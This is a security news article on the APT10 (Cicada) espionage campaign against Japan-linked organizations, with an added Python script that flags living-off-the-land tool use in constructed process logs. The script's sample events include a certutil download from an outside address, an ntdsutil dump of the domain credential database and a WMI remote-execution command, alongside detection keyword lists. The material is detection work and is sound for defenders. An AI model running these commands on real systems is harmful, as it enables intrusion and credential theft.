
Chinese Hackers Target Japanese Organizations in Large-Scale Campaign

China-linked threat actor APT10 was observed launching a large-scale campaign against Japanese organizations and their subsidiaries.

Also referred to as Cicada, Stone Panda, and Cloud Hopper, APT10 is known for launching espionage campaigns for over a decade, including attacks aimed at managed service providers (MSPs) and Japan-linked organizations.

As part of the newly observed campaign, the hacking group has been using a combination of living-off-the-land tools and custom malware, including Backdoor.Hartip, which appears to be a new addition to its arsenal.

During the attacks, the adversary compromised domain controllers and file servers, and the researchers found evidence that data was exfiltrated from some of the infected systems, Symantec, a division of Broadcom, reports.

One of the main characteristics of this attack was the extensive use of DLL side-loading, with recent incidents showing the adoption of an exploit for the Zerologon vulnerability that Microsoft patched in August.

The attacks likely started in mid-October 2019 and continued at least up to the beginning of October 2020. In some cases, the attackers managed to maintain a foothold in the compromised networks for nearly one year.

Victims were mainly large, well-known organizations, many of them headquartered in Japan or with links to Japan. The attacks mainly focused on South and East Asia, with one victim being a Chinese subsidiary of a Japanese organization, an atypical target for a state-sponsored Chinese group.

Targeted sectors include automotive (including suppliers of parts for the motor industry), clothing, conglomerates, engineering, electronics, government, general trading, industrial products, manufacturing, MSPs, pharmaceutical, and professional services.

Although the attackers spent a significant amount of time in the networks of some victims, they left other networks after only days. In some cases, the attackers ceased activity on a network after a short period, but returned months later.

As part of the attacks, the hackers used living-off-the-land, dual-use, and publicly available tools and techniques for network reconnaissance, credential theft, file archiving, and more, including Certutil, Adfind, Csvde, Ntdsutil, WMIExec, and PowerShell.
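The tool list above is the defender's main handle on this campaign: none of these binaries is malware, so detection has to come from how and where they are run and from several of them appearing together on one host. The script below is an added example (not code from Symantec or SecurityWeek) that applies that idea to constructed Sysmon Event ID 1-style process-creation records. The host names, user names, the 198.51.100.7 address and the escalation threshold are all assumptions made for the example; the command-line fragments it keys on (certutil's -urlcache/-decode, ntdsutil's "ac i ntds"/"ifm", a shell spawned by WmiPrvSE.exe as the footprint WMIExec-style remote execution leaves on a target) are widely documented detection heuristics.

```python
"""Toy triage of living-off-the-land tool usage over process-creation events.

Added example, not part of the original article or the Symantec report.
Event records, host/user names and thresholds are constructed for illustration.
"""
from collections import defaultdict

# Dual-use binaries named in the report, with the stage each usually serves.
LOLBINS = {
    "certutil.exe": "file download/decode",
    "adfind.exe": "Active Directory reconnaissance",
    "csvde.exe": "Active Directory export",
    "ntdsutil.exe": "credential theft (NTDS.dit dump)",
    "powershell.exe": "scripting",
}

# Command-line fragments that turn an ordinary admin tool into a strong signal.
HIGH_RISK_ARGS = {
    "certutil.exe": ("-urlcache", "-decode"),
    "ntdsutil.exe": ("ac i ntds", "ifm"),
    "powershell.exe": ("-enc", "-encodedcommand", "bypass"),
}

# Constructed Sysmon Event ID 1-style records (fictitious hosts and users).
SAMPLE_EVENTS = [
    {"UtcTime": "2020-10-01 02:14:11", "Computer": "FS01.corp.example",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1601518451 2>&1",
     "User": "CORP\\svc-backup"},
    {"UtcTime": "2020-10-01 02:15:03", "Computer": "FS01.corp.example",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://198.51.100.7/u.txt C:\Users\Public\u.txt",
     "User": "CORP\\svc-backup"},
    {"UtcTime": "2020-10-01 02:20:44", "Computer": "DC01.corp.example",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\ntdsutil.exe",
     "CommandLine": r'ntdsutil.exe "ac i ntds" "ifm" "create full C:\Windows\Temp\x" q q',
     "User": "CORP\\Administrator"},
    {"UtcTime": "2020-10-01 09:00:00", "Computer": "WS07.corp.example",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\inventory.ps1",
     "User": "CORP\\jdoe"},
]


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return (severity, reason) for one event, or None if it is uninteresting."""
    image = basename(event["Image"])
    parent = basename(event["ParentImage"])
    cmd = event["CommandLine"].lower()
    # A command shell whose parent is the WMI provider host is the pattern that
    # WMIExec-style remote execution leaves on the target machine.
    if parent == "wmiprvse.exe" and image in ("cmd.exe", "powershell.exe"):
        return ("high", "shell spawned by WmiPrvSE.exe (WMI remote execution pattern)")
    if image not in LOLBINS:
        return None
    for frag in HIGH_RISK_ARGS.get(image, ()):
        if frag in cmd:
            return ("high", f"{image} {LOLBINS[image]} with argument '{frag}'")
    # Plain execution of a dual-use tool: low on its own, meaningful in a chain.
    return ("low", f"{image} ({LOLBINS[image]}) executed")


def triage(events, chain_threshold=2):
    """Group findings per host and escalate hosts that show any high-severity
    hit or at least `chain_threshold` dual-use tool executions (assumed value).
    Returns {host: [(time, user, severity, reason), ...]} for escalated hosts."""
    per_host = defaultdict(list)
    for ev in events:
        hit = classify(ev)
        if hit:
            per_host[ev["Computer"]].append((ev["UtcTime"], ev["User"], *hit))
    escalated = {}
    for host, hits in per_host.items():
        if any(sev == "high" for _, _, sev, _ in hits) or len(hits) >= chain_threshold:
            escalated[host] = hits
    return escalated


if __name__ == "__main__":
    for host, hits in triage(SAMPLE_EVENTS).items():
        print(host)
        for when, user, sev, reason in hits:
            print(f"  [{sev}] {when} {user}: {reason}")
```

With the constructed input, FS01 and DC01 are escalated while WS07 (a single, plainly scripted PowerShell run) is not; in a real deployment the low-severity single hits are still worth keeping as context for the days- to months-long dwell times the report describes, since the chain often only becomes visible across events spread over a long window.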

“The scale and sophistication of this attack campaign indicate that it is the work of a large and well-resourced group, such as a nation-state actor, with Symantec discovering enough evidence to attribute it with medium confidence to Cicada,” Symantec notes.

In a separate report published this week, KELA threat intelligence analyst Victoria Kivilevich explained that data belonging to Japanese corporations (government and educational entities included) is being traded on the Dark Web. Such data includes stolen credentials that provide adversaries with initial access to internal networks. Over 100 million exposed Japanese emails were identified.

Between June and October 2020, KELA observed 11 attacks on Japanese organizations, all carrying ransomware, with manufacturing, construction, and government sectors being affected. While the compromise vector is not certain in all cases, the CVE-2019-11510 Pulse Secure flaw was targeted in at least one incident.

“Among the most prominent threats on the darknet, KELA observed leaks and sales of Japanese entities’ data. While many offers are related to regular users, some actors are specifically looking for corporate data of Japanese organizations,” KELA notes.

Related: Chinese APT Uses DLL Side-Loading in Attacks on Myanmar

Related: Hacker Group Targeted U.S. Utilities in Two Parallel Campaigns

Related: New APT10 Activity Detected in Southeast Asia

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
